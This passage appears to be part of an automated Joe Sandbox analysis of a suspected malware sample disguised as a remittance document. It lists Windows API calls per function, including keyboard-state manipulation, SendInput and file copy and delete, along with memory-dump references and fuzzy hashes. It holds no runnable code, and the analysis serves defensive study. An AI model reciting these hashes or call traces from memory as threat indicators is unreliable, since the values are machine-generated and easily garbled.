                                                                      • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                      • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                      APIs
                                                                      • GetClientRect.USER32(?,?), ref: 004302E6
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                      • GetClientRect.USER32(?,?), ref: 00430364
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                      • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                      • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                      • String ID:
                                                                      • API String ID: 3220332590-0
                                                                      • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                      • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                      • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                      • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1612042205-0
                                                                      • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                      • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                      • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                      • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove_strncmp
                                                                      • String ID: >$U$\
                                                                      • API String ID: 2666721431-237099441
                                                                      • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                      • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                      • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                      • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 0044C570
                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$InputSend
                                                                      • String ID:
                                                                      • API String ID: 2221674350-0
                                                                      • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                      • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                      • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                      • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$_wcscat
                                                                      • String ID:
                                                                      • API String ID: 2037614760-0
                                                                      • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                      • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                      • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                      • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                      • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                      • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                      • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Copy$AllocClearErrorLastString
                                                                      • String ID:
                                                                      • API String ID: 960795272-0
                                                                      • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                      • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                      • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                      • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: File$Delete$Copy__fread_nolock
                                                                      • String ID:
                                                                      • API String ID: 2446588422-0
                                                                      • Opcode ID: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                                      • Instruction ID: e3b766f0d7570c057f36e817525b07a345c540c94ec9958bdefdc59333e68e6d
                                                                      • Opcode Fuzzy Hash: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                                      • Instruction Fuzzy Hash: D9517CB26083409BC320DF6AD984AAFB7E8FBD9740F10492FF68983201DA75D548CB56
                                                                      APIs
                                                                      • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                      • EndPaint.USER32(?,?), ref: 00447D13
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                      • String ID:
                                                                      • API String ID: 4189319755-0
                                                                      • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                      • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                      • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                      • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 1976402638-0
                                                                      • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                      • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                      • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                      • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                      APIs
                                                                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                      • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                      • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                      • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Copy$ClearErrorLast
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 2487901850-572801152
                                                                      • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                      • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                      • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                      • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Enable$Show$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 1871949834-0
                                                                      • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                      • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                      • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                      • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                      • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                      • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                      • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                      APIs
                                                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                      • SendMessageW.USER32 ref: 00471AE3
                                                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                      • String ID:
                                                                      • API String ID: 3611059338-0
                                                                      • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                      • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                      • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                      • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                                                      • String ID:
                                                                      • API String ID: 1640429340-0
                                                                      • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                      • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                      • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                      • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                      APIs
                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
